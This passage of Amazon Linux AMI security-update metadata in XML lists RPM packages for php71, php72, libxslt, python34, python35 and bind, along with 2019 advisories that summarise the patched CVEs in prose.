arch="x86_64"><filename>Packages/php71-pgsql-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-odbc" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-pdo" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-embedded" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-tidy-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-debuginfo" version="7.1.30" 
release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-ldap" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-snmp-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-common" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-opcache-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-xmlrpc" version="7.1.30" 
release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-process" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-process-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.30" 
release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package 
name="php72-imap" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.19" release="1.14.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php72-cli-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.19" 
release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.19" 
release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.19" 
release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.19-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1241</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1241: medium priority package update for libxslt</title><issued date="2019-07-17 23:37:00" /><updated date="2019-07-25 18:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11068:
libxslt through 1.1.33 allows bypass of a protection mechanism because callers of xsltCheckRead and xsltCheckWrite permit access even upon receiving a -1 error code. xsltCheckRead can return -1 for a crafted URL that is not actually invalid and is subsequently loaded.
1709697:
CVE-2019-11068 libxslt: xsltCheckRead and xsltCheckWrite routines security bypass by crafted URL
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11068" title="" id="CVE-2019-11068" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxslt-debuginfo" version="1.1.28" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-debuginfo-1.1.28-5.13.amzn1.x86_64.rpm</filename></package><package name="libxslt-python26" version="1.1.28" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-python26-1.1.28-5.13.amzn1.x86_64.rpm</filename></package><package name="libxslt" version="1.1.28" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-1.1.28-5.13.amzn1.x86_64.rpm</filename></package><package name="libxslt-python27" version="1.1.28" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-python27-1.1.28-5.13.amzn1.x86_64.rpm</filename></package><package name="libxslt-devel" version="1.1.28" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-devel-1.1.28-5.13.amzn1.x86_64.rpm</filename></package><package name="libxslt-devel" version="1.1.28" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-devel-1.1.28-5.13.amzn1.i686.rpm</filename></package><package name="libxslt-python27" version="1.1.28" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-python27-1.1.28-5.13.amzn1.i686.rpm</filename></package><package name="libxslt-python26" version="1.1.28" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-python26-1.1.28-5.13.amzn1.i686.rpm</filename></package><package name="libxslt" version="1.1.28" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-1.1.28-5.13.amzn1.i686.rpm</filename></package><package name="libxslt-debuginfo" version="1.1.28" release="5.13.amzn1" epoch="0" 
arch="i686"><filename>Packages/libxslt-debuginfo-1.1.28-5.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1242</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1242: medium priority package update for python34</title><issued date="2019-07-17 23:50:00" /><updated date="2019-07-25 18:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9947:
An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the path component of a URL that lacks a ? character) followed by an HTTP header or a Redis command. This is similar to the CVE-2019-9740 query string issue.
1695572:
CVE-2019-9947 python: improper neutralization of CRLF sequences in urllib module
1695572:
CVE-2019-9947 python: CRLF injection via the path part of the url passed to urlopen()
CVE-2019-9740:
An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the query string after a ? character) followed by an HTTP header or a Redis command.
1688169:
CVE-2019-9740 python: improper neutralization of CRLF sequences in urllib module
1688169:
CVE-2019-9740 python: CRLF injection via the query part of the url passed to urlopen()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9740" title="" id="CVE-2019-9740" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9947" title="" id="CVE-2019-9947" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python34-libs" version="3.4.10" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.10-1.45.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.10-1.45.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.10" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.10-1.45.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.10-1.45.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.10-1.45.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.10-1.45.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.10" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.10-1.45.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.10-1.45.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.10-1.45.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.45.amzn1" epoch="0" 
arch="i686"><filename>Packages/python34-libs-3.4.10-1.45.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.10-1.45.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.10-1.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1243</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1243: medium priority package update for python35</title><issued date="2019-07-17 23:51:00" /><updated date="2019-07-25 18:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9947:
An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the path component of a URL that lacks a ? character) followed by an HTTP header or a Redis command. This is similar to the CVE-2019-9740 query string issue.
1695572:
CVE-2019-9947 python: improper neutralization of CRLF sequences in urllib module
1695572:
CVE-2019-9947 python: CRLF injection via the path part of the url passed to urlopen()
CVE-2019-9740:
An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the query string after a ? character) followed by an HTTP header or a Redis command.
1688169:
CVE-2019-9740 python: improper neutralization of CRLF sequences in urllib module
1688169:
CVE-2019-9740 python: CRLF injection via the query part of the url passed to urlopen()
CVE-2019-9636:
Python 2.7.x through 2.7.16 and 3.x through 3.7.2 is affected by: Improper Handling of Unicode Encoding (with an incorrect netloc) during NFKC normalization. The impact is: Information disclosure (credentials, cookies, etc. that are cached against a given hostname). The components are: urllib.parse.urlsplit, urllib.parse.urlparse. The attack vector is: A specially crafted URL could be incorrectly parsed to locate cookies or authentication data and send that information to a different host than when parsed correctly.
1688543:
CVE-2019-9636 python: Information Disclosure due to urlsplit improper NFKC normalization
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9636" title="" id="CVE-2019-9636" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9740" title="" id="CVE-2019-9740" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9947" title="" id="CVE-2019-9947" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python35-test" version="3.5.7" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.7-1.22.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.7" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.7-1.22.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.7" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.7-1.22.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.7" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.7-1.22.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.7" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.7-1.22.amzn1.x86_64.rpm</filename></package><package name="python35-devel" version="3.5.7" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.7-1.22.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.7" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.7-1.22.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.7" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.7-1.22.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.7" release="1.22.amzn1" epoch="0" 
arch="i686"><filename>Packages/python35-devel-3.5.7-1.22.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.7" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.7-1.22.amzn1.i686.rpm</filename></package><package name="python35-tools" version="3.5.7" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.7-1.22.amzn1.i686.rpm</filename></package><package name="python35-debuginfo" version="3.5.7" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.7-1.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1244</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1244: important priority package update for bind</title><issued date="2019-07-17 23:52:00" /><updated date="2019-07-25 18:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5743:
A flaw was found in the way bind implemented the tunable that limits simultaneous TCP client connections. A remote attacker could use this flaw to exhaust the pool of file descriptors available to named, potentially affecting network connections and the management of files such as log files or zone journal files. In cases where the named process is not limited by OS-enforced per-process limits, this could additionally lead to exhaustion of all available free file descriptors on that system.
1702541:
CVE-2018-5743 bind: Limiting simultaneous TCP clients is ineffective
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5743" title="" id="CVE-2018-5743" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-chroot" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.60.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.60.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.60.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.68.rc1.60.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.68.rc1.60.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.68.rc1.60.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" 